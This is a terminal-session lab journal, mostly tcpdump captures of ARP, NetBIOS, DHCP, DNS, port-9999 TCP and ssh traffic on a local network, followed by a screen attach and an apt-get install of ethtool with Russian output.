Laboratory work journal

Contents

Journal

Tuesday (06/02/09)

/dev/pts/22
10:33:22
#10:33:23.333479 ARP, Request who-has 10.0.10.223 tell 10.0.10.222, length 46
10:33:23.607176 IP 10.0.40.21.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:23.777068 ARP, Request who-has 10.0.1.5 (Broadcast) tell 10.0.1.5, length 46
10:33:23.779110 ARP, Request who-has 10.0.13.2 (Broadcast) tell 10.0.13.2, length 46
10:33:24
#10:33:24.183339 ARP, Request who-has 10.0.1.1 tell 10.0.40.21, length 46
10:33:24.333108 ARP, Request who-has 10.0.10.223 tell 10.0.10.222, length 46
10:33:24.354713 IP 10.0.40.21.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:24.638802 IP 10.0.20.1.59331 > 255.255.255.255.1211: UDP, length 75
10:33:24.724267 ARP, Request who-has 10.0.51.1 tell 10.0.1.25, length 46
10:33:24.746634 ARP, Request who-has 10.0.20.201 tell 10.0.1.7, length 46
10:33:25.105413 IP 10.0.40.21.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:25.333168 ARP, Request who-has 10.0.10.223 tell 10.0.10.222, length 46
10:33:25.694844 IP 10.0.100.33.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:1b:9e:83:68:5e (oui Unknown), length 300
10:33:25.697299 IP 10.0.1.7.bootps > 255.255.255.255.bootpc: BOOTP/DHCP, Reply, length 300
10:33:25.700909 IP6 fe80::14ea:1c2e:316d:46bf.63586 > ff02::c.3702: UDP, length 1026
10:33:25.752581 ARP, Request who-has 10.0.20.201 tell 10.0.1.7, length 46
10:33:25.758776 IP6 fe80::50ad:2824:ffe6:7bdc.62889 > ff02::c.3702: UDP, length 1026
10:33:25.758881 IP 10.0.35.100.32769 > 10.0.35.1.domain: 64484+[|domain]
10:33:25.759130 IP 10.0.35.1.domain > 10.0.35.100.32769: 64484 NXDomain*[|domain]
10:33:25.772366 IP6 fe80::14ea:1c2e:316d:46bf.63586 > ff02::c.3702: UDP, length 1026
10:33:25.777796 ARP, Request who-has 10.0.1.5 (Broadcast) tell 10.0.1.5, length 46
10:33:25.779005 ARP, Request who-has 10.0.13.2 (Broadcast) tell 10.0.13.2, length 46
10:33:25.815354 IP6 fe80::50ad:2824:ffe6:7bdc.62889 > ff02::c.3702: UDP, length 1026
10:33:26
#10:33:26.858960 ARP, Request who-has 10.0.20.201 tell 10.0.1.7, length 46
10:33:27.059836 IP6 fe80::14ea:1c2e:316d:46bf.546 > ff02::1:2.547: dhcp6 solicit
10:33:27.777838 ARP, Request who-has 10.0.1.5 (Broadcast) tell 10.0.1.5, length 46
10:33:27.778902 ARP, Request who-has 10.0.13.2 (Broadcast) tell 10.0.13.2, length 46
10:33:28.464913 IP 10.0.40.116.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:28.640530 IP 192.168.14.1.netbios-dgm > 192.168.14.255.netbios-dgm: NBT UDP PACKET(138)
10:33:28.640666 IP 10.0.35.100.32769 > 10.0.35.1.domain: 32587+ PTR? 255.14.168.192.in-addr.arpa. (45)
10:33:28.695109 IP 10.0.100.33.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:1b:9e:83:68:5e (oui Unknown), length 300
10:33:28.696326 IP 10.0.1.7.bootps > 255.255.255.255.bootpc: BOOTP/DHCP, Reply, length 300
10:33:28.699911 IP 10.0.35.1.domain > 10.0.35.100.32769: 32587 NXDomain 0/1/0 (122)
10:33:28.706915 IP 10.0.100.33.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
...
        0x0010:  0000 0000 0105 0000 0000 0000 7400 6f00  ............t.o.
        0x0020:  7000 6100 7a00 2e00 7400 6500 6300 6800  p.a.z...t.e.c.h.
        0x0030:  2e00 6900 6e00 6300 0000 0000            ..i.n.c.....
10:33:29.456096 IP 10.0.100.33.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:29.566466 ARP, Request who-has 10.0.14.50 tell 10.0.1.120, length 46
10:33:29.776467 ARP, Request who-has 10.0.20.201 tell 10.0.1.7, length 46
10:33:29.776568 ARP, Request who-has 10.0.1.5 (Broadcast) tell 10.0.1.5, length 46
10:33:29.779933 ARP, Request who-has 10.0.13.2 (Broadcast) tell 10.0.13.2, length 46
10:33:29.944281 IP 10.0.40.116.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:30.003016 ARP, Request who-has 10.0.1.124 tell 10.0.1.120, length 46
10:33:30
#10:33:30.018613 ARP, Request who-has 10.0.1.120 tell 10.0.1.124, length 46
10:33:30.033999 ARP, Request who-has 192.168.14.1 tell 192.168.14.7, length 46
10:33:30.034363 ARP, Request who-has 192.168.14.7 tell 192.168.14.1, length 46
10:33:30.091217 IP 192.168.105.2.36358 > 10.0.35.100.9999: Flags [S], seq 3070528114, win 5840, options [mss 1460,sackOK,TS val 465882 ecr 0,nop,wscale 6], length 0
10:33:30.091235 IP 10.0.35.100.9999 > 192.168.105.2.36358: Flags [S.], seq 2025527372, ack 3070528115, win 5792, options [mss 1460,sackOK,TS val 17402235 ecr 465882,nop,wscale 4], length 0
10:33:30.092233 IP 192.168.105.2.36358 > 10.0.35.100.9999: Flags [.], ack 1, win 92, options [nop,nop,TS val 465882 ecr 17402235], length 0
10:33:30.093362 IP 192.168.105.2.36358 > 10.0.35.100.9999: Flags [P.], seq 1:265, ack 1, win 92, options [nop,nop,TS val 465882 ecr 17402235], length 264
10:33:30.093368 IP 10.0.35.100.9999 > 192.168.105.2.36358: Flags [.], ack 265, win 429, options [nop,nop,TS val 17402235 ecr 465882], length 0
10:33:30.105411 IP 10.0.35.100.38546 > 10.0.35.1.9999: Flags [S], seq 2028139423, win 5840, options [mss 1460,sackOK,TS val 17402239 ecr 0,nop,wscale 4], length 0
10:33:30.105517 IP 10.0.35.1.9999 > 10.0.35.100.38546: Flags [S.], seq 4061438496, ack 2028139424, win 5792, options [mss 1460,sackOK,TS val 410134797 ecr 17402239,nop,wscale 4], length 0
10:33:30.105527 IP 10.0.35.100.38546 > 10.0.35.1.9999: Flags [.], ack 1, win 365, options [nop,nop,TS val 17402239 ecr 410134797], length 0
...
10:33:30.333027 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [S], seq 3077844109, win 5840, options [mss 1460,sackOK,TS val 465942 ecr 0,nop,wscale 6], length 0
10:33:30.333035 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [S.], seq 2027690652, ack 3077844110, win 5792, options [mss 1460,sackOK,TS val 17402296 ecr 465942,nop,wscale 4], length 0
10:33:30.333992 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 1, win 92, options [nop,nop,TS val 465942 ecr 17402296], length 0
10:33:30.334226 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [P.], seq 1:232, ack 1, win 92, options [nop,nop,TS val 465943 ecr 17402296], length 231
10:33:30.334230 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], ack 232, win 429, options [nop,nop,TS val 17402296 ecr 465943], length 0
10:33:30.362069 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [S], seq 2031840393, win 5840, options [mss 1460,sackOK,TS val 17402301 ecr 0,nop,wscale 4], length 0
10:33:30.362153 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [S.], seq 4076464478, ack 2031840394, win 5792, options [mss 1460,sackOK,TS val 410134861 ecr 17402301,nop,wscale 4], length 0
10:33:30.362168 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 1, win 365, options [nop,nop,TS val 17402301 ecr 410134861], length 0
10:33:30.362329 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [P.], seq 1:231, ack 1, win 365, options [nop,nop,TS val 17402301 ecr 410134861], length 230
10:33:30.362416 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], ack 231, win 429, options [nop,nop,TS val 410134861 ecr 17402301], length 0
10:33:30
#10:33:30.630126 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 1:18, ack 231, win 429, options [nop,nop,TS val 410134926 ecr 17402301], length 17
10:33:30.630134 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 18, win 365, options [nop,nop,TS val 17402370 ecr 410134926], length 0
10:33:30.630157 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 18:2914, ack 231, win 429, options [nop,nop,TS val 410134926 ecr 17402301], length 2896
10:33:30.630159 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 2914, win 546, options [nop,nop,TS val 17402370 ecr 410134926], length 0
10:33:30.630217 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 2914:4286, ack 231, win 429, options [nop,nop,TS val 410134926 ecr 17402370], length 1372
10:33:30.630221 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 4286, win 727, options [nop,nop,TS val 17402370 ecr 410134926], length 0
10:33:30.659739 IP 10.0.50.1.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:30.669013 ARP, Request who-has 10.0.50.1 tell 10.0.1.4, length 46
10:33:30.681234 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 4286:7182, ack 231, win 429, options [nop,nop,TS val 410134939 ecr 17402370], length 2896
10:33:30.681237 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 7182, win 908, options [nop,nop,TS val 17402383 ecr 410134939], length 0
10:33:30.681244 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 7182:8382, ack 231, win 429, options [nop,nop,TS val 410134939 ecr 17402370], length 1200
...
10:33:30.756983 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 16572, win 635, options [nop,nop,TS val 466048 ecr 17402401], length 0
10:33:30.803322 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 20670:23566, ack 231, win 429, options [nop,nop,TS val 410134971 ecr 17402401], length 2896
10:33:30.803326 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 23566, win 2356, options [nop,nop,TS val 17402413 ecr 410134971], length 0
10:33:30.803333 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 23566:24766, ack 231, win 429, options [nop,nop,TS val 410134971 ecr 17402401], length 1200
10:33:30.803335 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 24766, win 2537, options [nop,nop,TS val 17402413 ecr 410134971], length 0
10:33:30.803539 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 16572:19468, ack 232, win 429, options [nop,nop,TS val 17402413 ecr 466048], length 2896
10:33:30.803544 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 19468:20668, ack 232, win 429, options [nop,nop,TS val 17402413 ecr 466048], length 1200
10:33:30.804969 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 18020, win 680, options [nop,nop,TS val 466060 ecr 17402413], length 0
10:33:30.804974 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 19468, win 725, options [nop,nop,TS val 466060 ecr 17402413], length 0
10:33:30.804975 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 20668, win 770, options [nop,nop,TS val 466060 ecr 17402413], length 0
10:33:30
#10:33:30.832047 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 24766:27662, ack 231, win 429, options [nop,nop,TS val 410134977 ecr 17402413], length 2896
10:33:30.832053 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 27662, win 2718, options [nop,nop,TS val 17402420 ecr 410134977], length 0
10:33:30.832059 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 27662:28862, ack 231, win 429, options [nop,nop,TS val 410134977 ecr 17402413], length 1200
10:33:30.832062 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 28862, win 2899, options [nop,nop,TS val 17402420 ecr 410134977], length 0
10:33:30.832257 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 20668:23564, ack 232, win 429, options [nop,nop,TS val 17402420 ecr 466060], length 2896
10:33:30.832261 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 23564:24764, ack 232, win 429, options [nop,nop,TS val 17402420 ecr 466060], length 1200
10:33:30.833702 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 22116, win 816, options [nop,nop,TS val 466067 ecr 17402420], length 0
10:33:30.833707 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 23564, win 861, options [nop,nop,TS val 466067 ecr 17402420], length 0
10:33:30.833712 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 24764, win 906, options [nop,nop,TS val 466067 ecr 17402420], length 0
10:33:30.869112 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 28862:31758, ack 231, win 429, options [nop,nop,TS val 410134985 ecr 17402420], length 2896
10:33:30.869115 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 31758, win 3080, options [nop,nop,TS val 17402430 ecr 410134985], length 0
...
10:33:31.051490 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 61630, win 3879, options [nop,nop,TS val 17402475 ecr 410135033], length 0
10:33:31.051656 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 53436:56332, ack 232, win 429, options [nop,nop,TS val 17402475 ecr 466119], length 2896
10:33:31.051660 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 56332:57532, ack 232, win 429, options [nop,nop,TS val 17402475 ecr 466119], length 1200
10:33:31.053122 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 57532, win 1002, options [nop,nop,TS val 466122 ecr 17402475], length 0
10:33:31.098756 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 61630:64526, ack 231, win 429, options [nop,nop,TS val 410135045 ecr 17402475], length 2896
10:33:31.098766 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 64526:65726, ack 231, win 429, options [nop,nop,TS val 410135045 ecr 17402475], length 1200
10:33:31.098771 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 65726, win 3879, options [nop,nop,TS val 17402487 ecr 410135045], length 0
10:33:31.098962 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 57532:60428, ack 232, win 429, options [nop,nop,TS val 17402487 ecr 466122], length 2896
10:33:31.098966 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 60428:61628, ack 232, win 429, options [nop,nop,TS val 17402487 ecr 466122], length 1200
10:33:31.100428 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 61628, win 1002, options [nop,nop,TS val 466134 ecr 17402487], length 0
10:33:31
#10:33:31.107051 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 65726:68622, ack 231, win 429, options [nop,nop,TS val 410135045 ecr 17402487], length 2896
10:33:31.107055 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 68622:69822, ack 231, win 429, options [nop,nop,TS val 410135045 ecr 17402487], length 1200
10:33:31.107058 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 69822, win 3879, options [nop,nop,TS val 17402489 ecr 410135045], length 0
10:33:31.107195 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 61628:64524, ack 232, win 429, options [nop,nop,TS val 17402489 ecr 466134], length 2896
10:33:31.107200 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 64524:65724, ack 232, win 429, options [nop,nop,TS val 17402489 ecr 466134], length 1200
10:33:31.108656 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 65724, win 1002, options [nop,nop,TS val 466136 ecr 17402489], length 0
10:33:31.113953 ARP, Request who-has 10.0.14.50 tell 10.0.1.120, length 46
10:33:31.122141 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 69822:72718, ack 231, win 429, options [nop,nop,TS val 410135049 ecr 17402489], length 2896
10:33:31.122159 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 72718:73918, ack 231, win 429, options [nop,nop,TS val 410135049 ecr 17402489], length 1200
10:33:31.122162 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 73918, win 3879, options [nop,nop,TS val 17402493 ecr 410135049], length 0
10:33:31.122558 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 65724:68620, ack 232, win 429, options [nop,nop,TS val 17402493 ecr 466136], length 2896
...
10:33:31.412879 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 118974, win 3879, options [nop,nop,TS val 17402565 ecr 410135123], length 0
10:33:31.413016 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 110780:113676, ack 232, win 429, options [nop,nop,TS val 17402565 ecr 466202], length 2896
10:33:31.413025 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 113676:114876, ack 232, win 429, options [nop,nop,TS val 17402565 ecr 466202], length 1200
10:33:31.414507 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 114876, win 1002, options [nop,nop,TS val 466213 ecr 17402565], length 0
10:33:31.430407 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 118974:121870, ack 231, win 429, options [nop,nop,TS val 410135128 ecr 17402565], length 2896
10:33:31.430416 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 121870:123070, ack 231, win 429, options [nop,nop,TS val 410135128 ecr 17402565], length 1200
10:33:31.430426 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 123070, win 3879, options [nop,nop,TS val 17402570 ecr 410135128], length 0
10:33:31.430605 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 114876:117772, ack 232, win 429, options [nop,nop,TS val 17402570 ecr 466213], length 2896
10:33:31.430615 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 117772:118972, ack 232, win 429, options [nop,nop,TS val 17402570 ecr 466213], length 1200
10:33:31.432079 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 118972, win 1002, options [nop,nop,TS val 466217 ecr 17402570], length 0
10:33:31
#10:33:31.446512 IP 10.0.40.116.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:31.479246 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 123070:125966, ack 231, win 429, options [nop,nop,TS val 410135140 ecr 17402570], length 2896
10:33:31.479256 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 125966:127166, ack 231, win 429, options [nop,nop,TS val 410135140 ecr 17402570], length 1200
10:33:31.479260 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 127166, win 3879, options [nop,nop,TS val 17402582 ecr 410135140], length 0
10:33:31.479435 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 118972:121868, ack 232, win 429, options [nop,nop,TS val 17402582 ecr 466217], length 2896
10:33:31.479445 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 121868:123068, ack 232, win 429, options [nop,nop,TS val 17402582 ecr 466217], length 1200
10:33:31.480943 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 123068, win 1002, options [nop,nop,TS val 466229 ecr 17402582], length 0
10:33:31.482291 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 127166:130062, ack 231, win 429, options [nop,nop,TS val 410135140 ecr 17402582], length 2896
10:33:31.482333 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 130062:131262, ack 231, win 429, options [nop,nop,TS val 410135140 ecr 17402582], length 1200
10:33:31.482337 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 131262, win 3879, options [nop,nop,TS val 17402582 ecr 410135140], length 0
10:33:31.482482 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 123068:125964, ack 232, win 429, options [nop,nop,TS val 17402582 ecr 466229], length 2896
...
10:33:31.859873 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 196796:199692, ack 232, win 429, options [nop,nop,TS val 17402677 ecr 466316], length 2896
10:33:31.859878 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 199692:200892, ack 232, win 429, options [nop,nop,TS val 17402677 ecr 466316], length 1200
10:33:31.861435 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 200892, win 1002, options [nop,nop,TS val 466324 ecr 17402677], length 0
10:33:31.873134 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 204990:207886, ack 231, win 429, options [nop,nop,TS val 410135238 ecr 17402677], length 2896
10:33:31.873142 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 207886:209086, ack 231, win 429, options [nop,nop,TS val 410135238 ecr 17402677], length 1200
10:33:31.873147 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 209086, win 3879, options [nop,nop,TS val 17402681 ecr 410135238], length 0
10:33:31.873313 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 200892:203788, ack 232, win 429, options [nop,nop,TS val 17402681 ecr 466324], length 2896
10:33:31.873317 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 203788:204988, ack 232, win 429, options [nop,nop,TS val 17402681 ecr 466324], length 1200
10:33:31.874791 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 204988, win 1002, options [nop,nop,TS val 466328 ecr 17402681], length 0
10:33:31.889767 ARP, Request who-has 10.0.20.201 tell 10.0.1.7, length 46
10:33:31
#10:33:31.916456 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 209086:211982, ack 231, win 429, options [nop,nop,TS val 410135248 ecr 17402681], length 2896
10:33:32.477160 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 323774, win 3879, options [nop,nop,TS val 17402832 ecr 410135389], length 0
10:33:32.477349 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 315580:318476, ack 232, win 429, options [nop,nop,TS val 17402832 ecr 466468], length 2896
10:33:32.477356 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 318476:319676, ack 232, win 429, options [nop,nop,TS val 17402832 ecr 466468], length 1200
10:33:32.478814 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 319676, win 1002, options [nop,nop,TS val 466479 ecr 17402832], length 0
10:33:32.522340 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [.], seq 323774:326670, ack 231, win 429, options [nop,nop,TS val 410135401 ecr 17402832], length 2896
10:33:32.522345 IP 10.0.35.1.9999 > 10.0.35.100.38547: Flags [P.], seq 326670:327870, ack 231, win 429, options [nop,nop,TS val 410135401 ecr 17402832], length 1200
10:33:32.522349 IP 10.0.35.100.38547 > 10.0.35.1.9999: Flags [.], ack 327870, win 3879, options [nop,nop,TS val 17402842 ecr 410135401], length 0
10:33:32.522495 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [.], seq 319676:322572, ack 232, win 429, options [nop,nop,TS val 17402842 ecr 466479], length 2896
10:33:32.522500 IP 10.0.35.100.9999 > 192.168.105.2.36359: Flags [P.], seq 322572:323772, ack 232, win 429, options [nop,nop,TS val 17402842 ecr 466479], length 1200
10:33:32.523959 IP 192.168.105.2.36359 > 10.0.35.100.9999: Flags [.], ack 323772, win 1002, options [nop,nop,TS val 466490 ecr 17402842], length 0
...
10:33:32.815895 IP 10.0.35.1.9999 > 10.0.35.100.38548: Flags [.], ack 260, win 429, options [nop,nop,TS val 410135474 ecr 17402915], length 0
10:33:33.054109 IP 10.0.35.1.9999 > 10.0.35.100.38548: Flags [P.], seq 1:28, ack 260, win 429, options [nop,nop,TS val 410135533 ecr 17402915], length 27
10:33:33.054114 IP 10.0.35.100.38548 > 10.0.35.1.9999: Flags [.], ack 28, win 365, options [nop,nop,TS val 17402976 ecr 410135533], length 0
10:33:33.054165 IP 10.0.35.1.9999 > 10.0.35.100.38548: Flags [P.], seq 28:123, ack 260, win 429, options [nop,nop,TS val 410135533 ecr 17402976], length 95
10:33:33.054168 IP 10.0.35.100.38548 > 10.0.35.1.9999: Flags [.], ack 123, win 365, options [nop,nop,TS val 17402976 ecr 410135533], length 0
10:33:33.054211 IP 10.0.35.100.38548 > 10.0.35.1.9999: Flags [F.], seq 260, ack 123, win 365, options [nop,nop,TS val 17402976 ecr 410135533], length 0
10:33:33.054304 IP 10.0.35.1.9999 > 10.0.35.100.38548: Flags [F.], seq 123, ack 261, win 429, options [nop,nop,TS val 410135533 ecr 17402976], length 0
10:33:33.054308 IP 10.0.35.100.38548 > 10.0.35.1.9999: Flags [.], ack 124, win 365, options [nop,nop,TS val 17402976 ecr 410135533], length 0
10:33:33.054979 IP 10.0.35.100.9999 > 192.168.105.2.36360: Flags [P.], seq 1:28, ack 261, win 429, options [nop,nop,TS val 17402976 ecr 466560], length 27
10:33:33.056227 IP 192.168.105.2.36360 > 10.0.35.100.9999: Flags [.], ack 28, win 92, options [nop,nop,TS val 466623 ecr 17402976], length 0
10:33:44
#10:33:44.334563 ARP, Request who-has 10.0.10.223 tell 10.0.10.222, length 46
10:33:44.524992 IP 10.0.12.1 > 239.255.255.250: igmp v2 report 239.255.255.250
10:33:44.642358 IP 10.0.20.1.59331 > 255.255.255.255.1211: UDP, length 75
10:33:44.865679 ARP, Request who-has 10.0.20.201 tell 10.0.1.7, length 46
10:33:44.945768 IP 10.0.1.7.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:44.988607 IP 10.0.40.116.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:44
#10:33:45.334624 ARP, Request who-has 10.0.10.223 tell 10.0.10.222, length 46
10:33:45.695833 IP 10.0.1.7.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:33:45
#10:33:45.777125 ARP, Request who-has 10.0.1.5 (Broadcast) tell 10.0.1.5, length 46
10:34:19.775683 ARP, Request who-has 10.0.1.5 (Broadcast) tell 10.0.1.5, length 46
10:34:19.776411 ARP, Request who-has 10.0.13.2 (Broadcast) tell 10.0.13.2, length 46
10:34:19.833206 IP 10.0.40.116.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:34:20.029021 ARP, Request who-has 192.168.14.10 tell 192.168.14.1, length 46
10:34:20.051326 IP 10.0.47.1.1165 > 255.255.255.255.1211: UDP, length 75
10:34:20.175602 ARP, Request who-has 10.0.20.201 tell 10.0.1.7, length 46
10:34:20.189082 IP 10.0.1.2.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:34:20.294792 ARP, Request who-has 10.0.19.1 tell 10.0.1.25, length 46
10:34:20.302125 IP 10.0.1.3.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:34:20.583556 IP 10.0.40.116.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
...
10:34:33.076055 IP 10.0.35.100.ssh > linux13.unix.nt.54565: Flags [P.], seq 2860:2908, ack 2468, win 956, options [nop,nop,TS val 17417980 ecr 4294908186], length 48
10:34:33.076226 IP linux13.unix.nt.54565 > 10.0.35.100.ssh: Flags [.], ack 2908, win 214, options [nop,nop,TS val 4294908186 ecr 17417980], length 0
10:34:33.338640 ARP, Request who-has 10.0.10.223 tell 10.0.10.222, length 46
10:34:33.353248 IP linux13.unix.nt.54565 > 10.0.35.100.ssh: Flags [P.], seq 2468:2516, ack 2908, win 214, options [nop,nop,TS val 4294908255 ecr 17417980], length 48
10:34:33.353454 IP 10.0.35.100.ssh > linux13.unix.nt.54565: Flags [P.], seq 2908:2956, ack 2516, win 956, options [nop,nop,TS val 17418050 ecr 4294908255], length 48
10:34:33.353706 IP linux13.unix.nt.54565 > 10.0.35.100.ssh: Flags [.], ack 2956, win 214, options [nop,nop,TS val 4294908256 ecr 17418050], length 0
10:34:33.437021 IP linux13.unix.nt.54565 > 10.0.35.100.ssh: Flags [P.], seq 2516:2564, ack 2956, win 214, options [nop,nop,TS val 4294908276 ecr 17418050], length 48
10:34:33.437243 IP 10.0.35.100.ssh > linux13.unix.nt.54565: Flags [P.], seq 2956:3004, ack 2564, win 956, options [nop,nop,TS val 17418071 ecr 4294908276], length 48
10:34:33.437434 IP linux13.unix.nt.54565 > 10.0.35.100.ssh: Flags [.], ack 3004, win 214, options [nop,nop,TS val 4294908276 ecr 17418071], length 0
10:34:33.531129 ARP, Request who-has 192.168.14.253 tell 192.168.14.1, length 46
/dev/pts/10
10:34:30
#screen -x
/dev/pts/24
10:35:14
#apt-get install ethtool
Чтение списков пакетов... Готово
Построение дерева зависимостей
Чтение информации о состоянии... Готово
Уже установлена самая новая версия ethtool.
